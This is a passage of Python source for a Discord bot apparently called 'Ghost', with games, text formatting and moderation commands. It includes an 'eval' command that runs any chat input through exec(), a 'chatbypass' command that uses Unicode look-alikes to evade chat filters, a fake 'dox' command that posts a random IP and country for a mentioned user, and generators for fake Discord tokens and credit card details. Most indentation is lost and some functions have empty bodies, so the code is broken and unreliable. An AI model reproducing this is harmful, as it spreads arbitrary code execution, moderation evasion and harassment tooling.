e = discord.Embed(title=f'Player wins!', description=f'{player} cuts {computer}!', color=__embedcolour__)
elif player == "Scissors" and computer == 'Rock':
e = discord.Embed(title=f'Computer wins!', description=f'{computer} smashes {player}!', color=__embedcolour__)
else:
e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
e.set_thumbnail(url=__embedimage__)
e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
e.timestamp = datetime.now()
await ctx.send(embed=e)
except IndexError:
e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
e.set_thumbnail(url=__embedimage__)
e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
e.timestamp = datetime.now()
await ctx.send(embed=e)
except:
pass
else:
e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
e.set_thumbnail(url=__embedimage__)
e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
e.timestamp = datetime.now()
await ctx.send(embed=e)
@Ghost.command(name="8ball", description="Ask the magic eight ball a question.", usage="8ball [question]", aliases=["eightball", "magic8ball"])
async def eightball(ctx, *, question):
choices = ["As I see it, yes.", "Ask again later.", "Better not tell you now.", "Cannot predict now.", "Concentrate and ask again.", "Don’t count on it.", "It is certain.", "It is decidedly so.", "Most likely.", "My reply is no.", "My sources say no.", "Outlook not so good.", "Outlook good.", "Reply hazy, try again.", "Signs point to yes.", "Very doubtful.", "Without a doubt.", "Yes.", "Yes – definitely.", "You may rely on it."]
choice = random.choice(choices)
choice = "8ball says, " + choice
if __embedmode__:
embed = discord.Embed(title=f"{question}", description=choice, color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(question + "\n" + choice)
@Ghost.command(name="choice", description="Pick a random choice.", usage="choice [choice1] [choice2]", aliases=["pick", "decide"])
async def choice(ctx, choice1, choice2):
choices = [choice1, choice2]
choice = random.choice(choices)
if __embedmode__:
embed = discord.Embed(title=f"{choice}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(choice)
@Ghost.command(name="range", description="Pick a random number between two.", usage="random [number1] [number2]", aliases=["rangenumber", "pickrannumber"])
async def choice(ctx, arg1, arg2):
finalnumber = random.randint(int(arg1),int(arg2))
if __embedmode__:
embed = discord.Embed(title=f"{finalnumber}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(finalnumber)
# @Ghost.command(name="wyr", description="Would you rather questions.", usage="wyr")
# async def wyr_(ctx):
# question, _ = wyr()
# embed = discord.Embed(title="Would You Rather", description=question, color=__embedcolour__)
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(embed=embed)
# # await message.add_reaction("\U0001F7E6")
# # await message.add_reaction("\U0001F7E5")
@Ghost.command(name="dox", description="Dox the mentioned user.", usage="dox [@user]", aliases=["fakedox"])
async def dox(ctx, *, user: discord.User):
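    # Nothing is actually looked up; the "dox" below is a random IP, country and OS.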
randint1 = random.randint(100, 270)
randint2 = random.randint(100, 270)
randint3 = random.randint(10, 40)
randint4 = random.randint(100, 270)
countries = ["Afghanistan","Albania","Algeria","Andorra","Angola","Anguilla","Argentina","Armenia","Aruba","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bermuda","Bhutan","Bolivia","Bosnia & Herzegovina","Botswana","Brazil","British Virgin Islands","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Cape Verde","Cayman Islands","Chad","Chile","China","Colombia","Congo","Cook Islands","Costa Rica","Cote D Ivoire","Croatia","Cruise Ship","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","Ecuador","Egypt","El Salvador","Equatorial Guinea","Estonia","Ethiopia","Falkland Islands","Faroe Islands","Fiji","Finland","France","French Polynesia","French West Indies","Gabon","Gambia","Georgia","Germany","Ghana","Gibraltar","Greece","Greenland","Grenada","Guam","Guatemala","Guernsey","Guinea","Guinea Bissau","Guyana","Haiti","Honduras","Hong Kong","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Isle of Man","Israel","Italy","Jamaica","Japan","Jersey","Jordan","Kazakhstan","Kenya","Kuwait","Kyrgyz Republic","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macau","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Mauritania","Mauritius","Mexico","Moldova","Monaco","Mongolia","Montenegro","Montserrat","Morocco","Mozambique","Namibia","Nepal","Netherlands","Netherlands Antilles","New Caledonia","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palestine","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Puerto Rico","Qatar","Reunion","Romania","Russia","Rwanda","Saint Pierre & Miquelon","Samoa","San Marino","Saudi Arabia","Senegal","Serbia","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","South Africa","South Korea","Spain","Sri Lanka","St Kitts & Nevis","St Lucia","St Vincent","St. Lucia","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Timor L'Este","Togo","Tonga","Trinidad & Tobago","Tunisia","Turkey","Turkmenistan","Turks & Caicos","Uganda","Ukraine","United Arab Emirates","United Kingdom","Uruguay","Uzbekistan","Venezuela","Vietnam","Virgin Islands (US)","Yemen","Zambia","Zimbabwe","Reddit Isle"]
computer = ['Windows', 'Mac', 'Linux', 'IOS', 'Android', 'Unknown', 'TempleOS', 'Archbtw']
if __embedmode__:
embed = discord.Embed(title=f"Doxxed {user.name}", color=__embedcolour__)
embed.add_field(name="IP Address", value=f"```{randint1}.{randint2}.{randint3}.{randint4}```")
embed.add_field(name="Country", value="```" + random.choice(countries) + "```")
embed.add_field(name="Computer", value="```" + random.choice(computer) + "```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"Doxxed {user.name}\nIP Address: {randint1}.{randint2}.{randint3}.{randint4}\nCountry: " + random.choice(countries) + "\nComputer: " + random.choice(computer))
# @Ghost.command(name="fakenitro", description="Hide a link in a nitro URL.", usage="fakenitro [url]")
# async def fakenitro(ctx, *, url):
# code = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(16))
# nitro = "https://discord.gift/" + code
# if __embedmode__:
# embed = discord.Embed(title=f"Nitro", color=__embedcolour__, description=f"[{nitro}]({url})")
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(embed=embed)
# else:
# await ctx.send("This command can only be used in embed mode.")
@Ghost.command(name="nitrogen", description="Generate a nitro code.", usage="nitrogen", aliases=["nitrogenerate", "generatenitro", "gennitro"])
async def nitrogen(ctx):
code = ''.join(random.choice(string.ascii_letters + string.digits ) for i in range(19))
nitro = "https://discord.gift/" + code
if __embedmode__:
embed = discord.Embed(title=f"Nitro", color=__embedcolour__, description=f"{nitro}")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(nitro)
@Ghost.command(name="tokengen", description="Generate a discord user token.", usage="tokengen", aliases=["generatetoken", "tokengenerate", "gentoken"])
async def tokengen(ctx):
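    # A Discord token has three dot-separated parts; the first is the Base64-encoded user ID, and the other two are random filler here.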
authorId = str(ctx.author.id)
message_bytes = authorId.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
token1 = base64_bytes.decode('ascii')
token2 = ''.join(random.choice(string.ascii_letters + string.digits ) for i in range(6))
token3 = ''.join(random.choice(string.ascii_letters + string.digits ) for i in range(27))
token = f"{token1}.{token2}.{token3}"
if __embedmode__:
embed = discord.Embed(title=f"Token Generator", color=__embedcolour__, description=f"{token}")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(token)
@Ghost.command(name="eval", description="Very scary, summoned amogus in my house. Log4J in a nutshell :flushed:", usage="eval [scary code]", aliases=["evaluate"])
async def eval(ctx, *, arg):
exec(arg)
@Ghost.command(name="identitygen", description="Generate a fake identity.", usage="identitygen", aliases=["identitygenerate", "generateidentity", "genidentity", "idgen", "genid"])
async def identitygen(ctx):
firstname = fake.first_name()
lastname = fake.last_name()
address = fake.address()
job = fake.job()
phone = fake.phone_number()
emails = ["gmail.com", "yahoo.com", "yahoo.co.uk"]
emailchoice = random.choice(emails)
email = f"{firstname}.{lastname}@{emailchoice}"
birthdate = fake.date_of_birth()
genderchoices = ["Male", "Female"]
gender = random.choice(genderchoices)
if __embedmode__:
embed = discord.Embed(title=f"Identity Generator", color=__embedcolour__)
embed.add_field(name="Full Name", value=f"{firstname} {lastname}", inline=True)
embed.add_field(name="Email", value=f"{email}", inline=True)
embed.add_field(name="Phone Number", value=f"{phone}", inline=True)
embed.add_field(name="Occupation", value=f"{job}", inline=True)
embed.add_field(name="Birthdate", value=f"{birthdate}", inline=True)
embed.add_field(name="Gender", value=f"{gender}", inline=True)
embed.add_field(name="Address", value=f"{address}", inline=True)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Identity Generator ]
Full Name: {firstname} {lastname}
Email: {email}
Phone Number: {phone}
Occupation: {job}
Birthdate: {birthdate}
Gender: {gender}
Address: {address}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="passwordgen", description="Generate a secure password.", usage="passwordgen [length]", aliases=["passwordgenerate", "generatepassword", "genpassword"])
async def passwordgen(ctx, length: int):
password = ''.join(random.choice(string.ascii_letters) for i in range(length))
if __embedmode__:
embed = discord.Embed(title="Password Generator", color=__embedcolour__, description=f"Your generated password is ||{password}||")
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"Password: ||{password}||")
@Ghost.command(name="ccgen", description="Generate a fake Credit card.", usage="ccgen", aliases=["creditcardgenerate", "creditcardgen", "generatecc", "ccgenerate", "gencreditcard", "generatecreditcard"])
async def ccgen(ctx):
name = names.get_full_name()
address = fake.address()
cvv = random.randint(100, 999)
expiremonth = random.randint(1, 12)
expireyear = now.year + random.randint(1, 4)
choices = [4,5,6]
choice = random.choice(choices)
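    # The leading digit picks the card network: 4 = Visa, 5 = Mastercard, 6 = Discover.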
if choice == 4:
type = "Visa"
typeimg = "https://ghost.cool/assets/visa.png"
elif choice == 5:
type = "Mastercard"
typeimg = "https://ghost.cool/assets/mastercard.png"
elif choice == 6:
type = "Discover"
typeimg = "https://ghost.cool/assets/discover.png"
string1 = random.randint(100, 999)
string2 = random.randint(1000, 9999)
string3 = random.randint(1000, 9999)
string4 = random.randint(1000, 9999)
if __embedmode__:
embed = discord.Embed(title="Credit Card Generator", color=__embedcolour__)
embed.add_field(name="Number", value=f"{choice}{string1} {string2} {string3} {string4}", inline=True)
embed.add_field(name="Name", value=f"{name}", inline=True)
embed.add_field(name="CVV", value=f"{cvv}", inline=True)
embed.add_field(name="Expire Date", value=f"{expiremonth}/{expireyear}", inline=True)
embed.add_field(name="Type", value=f"{type}", inline=True)
embed.add_field(name="Address", value=f"{address}", inline=True)
embed.set_thumbnail(url=typeimg)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Credit Card Generator ]
Number: {choice}{string1} {string2} {string3} {string4}
Name: {name}
CVV: {cvv}
Expire Date: {expiremonth}/{expireyear}
Type: {type}
Address: {address}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
# @Ghost.command(name="cembed", description="Create a custom embedded message.", usage='cembed [title] [description] [colour]', aliases=["customembed"])
# async def cembed(ctx, title, description, colour):
# if __embedmode__:
# colour = int(colour.replace('#', '0x'), 0)
# embed = discord.Embed(title=title, description=description, color=colour)
# await ctx.send(embed=embed)
# else:
# await ctx.send("This command can only be used in embed mode.")
# @Ghost.command(name="embed", description="Create an embedded message.", usage="embed [title]")
# async def embed(ctx, *, title):
# if __embedmode__:
# embed = discord.Embed(title=title, color=__embedcolour__)
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(embed=embed)
# else:
# await ctx.send("This command can only be used in embed mode.")
@Ghost.command(name="leet", description="Turn your text into 1337 text.", usage="leet [text]", aliases=["1337", "leetspeak"])
async def leet(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/leet?text={text}").text)
@Ghost.command(name="zalgo", description="Unleash the zalgo into your message.", usage="zalgo [text]")
async def zalgo(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"http://timbw.ddns.net:5000/zalgo?text={text}").text)
@Ghost.command(name="upsidedown", description="Flip your text upsidedown.", usage="upsidedown [text]")
async def upsidedown(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/upsidedown?text={text}").text)
@Ghost.command(name="reverse", description="Reverse your text making them look backwards.", usage="reverse [text]", aliases=["backwards"])
async def reverse(ctx, *, text):
await ctx.send(''.join(list(reversed(text))))
@Ghost.command(name="ascii", description="Send your message in ascii.", usage="ascii [text]")
async def ascii(ctx, *, text):
message = text
art = requests.get(f'http://artii.herokuapp.com/make?text={urllib.parse.quote_plus(message)}+&font=standard').text
await ctx.send(f"```{art}```")
@Ghost.command(name="privatemsg", description="Send an encrypted message.", usage="privatemsg [message]", aliases=["b64encode", "privatemessage"])
async def privatemsg(ctx, *, message):
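    # "Encryption" here is plain Base64 encoding; privatemsgdecode reverses it.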
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
await ctx.send(base64_message)
@Ghost.command(name="privatemsgdecode", description="Decode an encrypted message.", usage="privatemsgdecode [message]", aliases=["b64decode", "privatemessagedecode"])
async def privatemsgdecode(ctx, *, message):
base64_message = message
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
await ctx.send(message)
@Ghost.command(name="encodebinary", description="Encode a message in binary.", usage="encodebinary [message]", aliases=["binaryencode", "binary"])
async def encodebinary(ctx, *, message):
translation = ""
@Ghost.command(name="decodebinary", description="Decode a message in binary.", usage="decodebinary [message]", aliases=["binarydecode", "unbinary"])
async def decodebinary(ctx, *, message):
translation = ""
@Ghost.command(name="encodemorse", description="Encode a message in morsecode", usage="encodemorse [message]", aliases=["morseencode", "morse"])
async def encodemorse(ctx, *, message):
text = message.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/encodemorse?text={text}").text)
@Ghost.command(name="decodemorse", description="Decode a message in morsecode", usage="decodemorse [message]", aliases=["morsedecode", "unmorse"])
async def decodemorse(ctx, *, message):
text = message.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/decodemorse?text={text}").text)
@Ghost.command(name="secret", description="Send all your messages in a secret block.", usage="secret [message]")
async def secret(ctx, *, message):
await ctx.send('||' + message + '||')
@Ghost.command(name="secretletters", description="Put all lettes from your message into separate secret blocks", usage="secretletters [message]")
async def secretletters(ctx, *, message):
def split(word):
return list(word)
msg = ""
for letter in split(message):
msg += "||" + letter + "||"
await ctx.send(msg)
@Ghost.command(name="bold", description="Send all your messages in bold.", usage="bold [message]")
async def bold(ctx, *, message):
await ctx.send('**' + message + '**')
@Ghost.command(name="italic", description="Send all your messages in italics.", usage="italic [message]")
async def italic(ctx, *, message):
await ctx.send('*' + message + '*')
@Ghost.command(name="cpp", description="Send all your messages in a C++ code block.", usage="cpp [message]")
async def cpp(ctx, *, message):
await ctx.send(f"""```cpp\n{message}```""")
@Ghost.command(name="cs", description="Send all your messages in a C Sharp code block.", usage="cs [message]")
async def cs(ctx, *, message):
await ctx.send(f"""```cs\n{message}```""")
@Ghost.command(name="java", description="Send all your messages in a Java code block.", usage="java [message]")
async def java(ctx, *, message):
await ctx.send(f"""```java\n{message}```""")
@Ghost.command(name="python", description="Send all your messages in a Python code block.", usage="python [message]")
async def python(ctx, *, message):
await ctx.send(f"""```py\n{message}```""")
@Ghost.command(name="js", description="Send all your messages in a JavaScript code block.", usage="js [message]")
async def js(ctx, *, message):
await ctx.send(f"""```js\n{message}```""")
@Ghost.command(name="lua", description="Send all your messages in a Lua code block.", usage="lua [message]")
async def lua(ctx, *, message):
await ctx.send(f"""```lua\n{message}```""")
@Ghost.command(name="php", description="Send all your messages in a PHP code block.", usage="php [message]")
async def php(ctx, *, message):
await ctx.send(f"""```php\n{message}```""")
@Ghost.command(name="html", description="Send all your messages in a HTML code block.", usage="html [message]")
async def html(ctx, *, message):
await ctx.send(f"""```html\n{message}```""")
@Ghost.command(name="css", description="Send all your messages in a CSS code block.", usage="css [message]")
async def css(ctx, *, message):
await ctx.send(f"""```css\n{message}```""")
@Ghost.command(name="yaml", description="Send all your messages in a YAML code block.", usage="yaml [message]")
async def yaml(ctx, *, message):
await ctx.send(f"""```yaml\n{message}```""")
@Ghost.command(name="json", description="Send all your messages in a JSON code block.", usage="json [message]")
async def _json(ctx, *, message):
await ctx.send(f"""```json\n{message}```""")
@Ghost.command(name="aesthetic", description="Send your text s p a c e d out.", usage="aesthetic [text]")
async def aesthetic(ctx, *, text):
message = text
msg = ""
for letter in list(message):
msg += " " + letter + " "
await ctx.send(msg)
@Ghost.command(name="animate", description="Animate your text.", usage="animate [text]")
async def animate(ctx, *, text):
output = ""
text = list(text)
msg = await ctx.send(text[0])
for letter in text:
output = output + letter + ""
await msg.edit(content=output)
await asyncio.sleep(1)
@Ghost.command(name="chatbypass", description="Bypass chat language restrictions.", usage="chatbypass [text]", aliases=["bypasschat"])
async def chatbypass(ctx, *, text):
text = text.lower()
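    # Map ASCII letters to Unicode "Mathematical Monospace" look-alikes so text filters treat them as different characters.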
regional_indicators = {
'a': '𝚊',
'b': '𝚋',
'c': '𝚌',
'd': '𝚍',
'e': '𝚎',
'f': '𝚏',
'g': '𝚐',
'h': '𝚑',
'i': '𝚒',
'j': '𝚓',
'k': '𝚔',
'l': '𝚕',
'm': '𝚖',
'n': '𝚗',
'o': '𝚘',
'p': '𝚙',
'q': '𝚚',
'r': '𝚛',
's': '𝚜',
't': '𝚝',
'u': '𝚞',
'v': '𝚟',
'w': '𝚠',
'x': '𝚡',
'y': '𝚢',
'z': '𝚣'
}
output = ""
text = list(text)
for letter in text:
if letter in regional_indicators:
output = output + regional_indicators[letter] + ""
else:
output = output + letter
await ctx.send(output)
@Ghost.command(name="regional", description="Replace all letters with emoji.", usage="regional [text]", aliases=["emojireplace", "change2emoji"])
async def regional(ctx, *, text):
text = text.lower()
    # U+1F1E6 is REGIONAL INDICATOR SYMBOL LETTER A; the 26 letter symbols are consecutive code points.
    regional_indicators = {chr(ord('a') + i): chr(0x1F1E6 + i) for i in range(26)}
output = ""
text = list(text)
for letter in text:
if letter in regional_indicators:
output = output + regional_indicators[letter] + " "
else:
output = output + letter
await ctx.send(output)
@Ghost.command(name="reactspam", description="Spam reactions on X amount of messages.", usage="reactspam [emoji] [messages]", aliases=["spamreactions", "spamreact"])
async def reactspam(ctx, emoji, messages: int):
if __riskmode__:
#channel = Ghost.get_channel(ctx.channel.id)
msgs = await ctx.channel.history(limit=messages).flatten()
for msg in msgs:
try:
await msg.add_reaction(emoji)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you can't use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="uppercase", description="Send your message in uppercase.", usage="uppercase [msg]")
async def uppercase(ctx, *, msg):
string = msg.upper()
await ctx.send(string)
@Ghost.command(name="lowercase", description="Send your message in lowercase.", usage="lowercase [msg]")
async def lowercase(ctx, *, msg):
string = msg.lower()
await ctx.send(string)
@Ghost.command(name="sentencecase", description="Send your messages in sentence case.", usage="sentencecase [msg]")
async def sentencecase(ctx, *, msg):
sentenceList = msg.split(". ")
sentenceList2 = []
for string in sentenceList:
string = string[:1].upper() + string[1:]
sentenceList2.append(string)
sentence = ". ".join(sentenceList2)
await ctx.send(sentence)
@Ghost.command(name="banlist", description="See the server's ban list.", usage="banlist")
async def banlist(ctx):
if ctx.author.guild_permissions.manage_guild:
msg = ""
banlist = await ctx.guild.bans()
for ban in banlist:
#username = user[0].name
msg += f"{ban.user.name}#{ban.user.discriminator} ({ban.user.id})\n"
if __embedmode__:
embed = discord.Embed(title=ctx.guild.name + "'s banned member list", description=msg, color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {ctx.guild.name}'s banned member list ]
{msg}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="ban", description="Ban the mentioned user.", usage="ban [@user]")
async def ban(ctx, *, user: discord.Member):
if ctx.author.guild_permissions.ban_members:
await user.ban()
if __embedmode__:
embed = discord.Embed(title=user.name + " has been banned", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been banned")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="unban", description="Unban the mentioned id.", usage="unban [id]")
async def unban(ctx, *, id: int):
if ctx.author.guild_permissions.ban_members:
user = await Ghost.fetch_user(id)
await ctx.guild.unban(user)
if __embedmode__:
embed = discord.Embed(title=user.name + " has been unbanned", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been unbanned")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="kick", description="Kick the mentioned user.", usage="kick [@user]")
async def kick(ctx, user: discord.Member):
if ctx.author.guild_permissions.kick_members:
await user.kick()
if __embedmode__:
embed = discord.Embed(title=user.name + " has been kicked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been kicked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="mute", description="Mute the menitioned user.", usage="mute [@user]")
async def mute(ctx, user: discord.Member):
if ctx.author.guild_permissions.mute_members:
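        # Reuse an existing "Muted" role if there is one, otherwise create it, then deny it permissions in every channel.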
if get(ctx.guild.roles, name="Muted"):
mutedrole = get(ctx.guild.roles, name="Muted")
else:
await ctx.guild.create_role(name="Muted")
mutedrole = get(ctx.guild.roles, name="Muted")
        for channel in ctx.guild.channels:
            # Channel types are enums, so compare against their string form rather than "Text".
            if str(channel.type) == "text":
                await channel.set_permissions(mutedrole, send_messages=False)
            else:
                await channel.set_permissions(mutedrole, send_messages=False, connect=False)
await user.add_roles(mutedrole)
if __embedmode__:
embed = discord.Embed(title=user.name + " has been muted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} has been muted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="unmute", description="Unmute the mentioned user.", usage="unmute [@user]")
async def unmute(ctx, user: discord.Member):
if ctx.author.guild_permissions.mute_members:
mutedrole = get(ctx.guild.roles, name="Muted")
        if mutedrole in user.roles:
            # Remove the role regardless of embed mode, then report it.
            await user.remove_roles(mutedrole)
            if __embedmode__:
                embed = discord.Embed(title=user.name + " has been unmuted", color=__embedcolour__)
                embed.set_thumbnail(url=__embedimage__)
                embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
                embed.timestamp = datetime.now()
                await ctx.send(embed=embed, delete_after=__deletetimeout__)
            else:
                await ctx.send(f"{user.name} has been unmuted")
else:
if __embedmode__:
embed = discord.Embed(title=user.name + " is not muted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"{user.name} is not muted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="newrole", description="Create a new role.", usage="newrole [name]", aliases=["createrole"])
async def newrole(ctx, *, name):
if ctx.author.guild_permissions.manage_roles:
await ctx.guild.create_role(name=name)
if __embedmode__:
embed = discord.Embed(title="@" + name + " has been created", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"@{name} has been created")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="delrole", description="Delete the mentioned role.", usage="delrole [@role]", aliases=["deleterole"])
async def delrole(ctx, *, role: discord.Role):
if ctx.author.guild_permissions.manage_roles:
await role.delete()
if __embedmode__:
embed = discord.Embed(title="@" + role.name + " has been deleted", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"@{role.name} has been deleted")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="purge", description="Purge X amount of messages.", usage="purge [amount]")
async def purge(ctx, amount: int):
if ctx.author.guild_permissions.manage_messages:
history = await ctx.channel.history(limit=amount).flatten()
deletedamount = 0
        for message in history:
            try:
                # Only count messages that were actually deleted.
                await message.delete()
                deletedamount += 1
                await asyncio.sleep(1)
            except:
                pass
if __embedmode__:
embed = discord.Embed(title=f"Deleted {deletedamount} messages", color=__embedcolour__)
